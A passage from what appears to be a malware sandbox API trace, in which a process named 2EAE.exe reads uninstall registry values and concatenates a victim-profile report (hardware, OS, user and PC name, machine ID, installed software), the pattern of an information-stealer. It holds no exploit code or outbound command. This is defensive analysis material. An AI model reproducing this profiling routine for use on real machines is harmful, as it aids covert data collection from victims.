lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpcbData=0x197fd4*=0x3e) returned 0x0 [0175.956] lstrlenA (lpString="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005") returned 61 [0175.956] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\n", lpString2="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005" [0175.956] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="12.0.21005", lpcbData=0x197fd4*=0xb) returned 0x0 [0175.957] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 " [0175.957] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 ", lpString2="12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 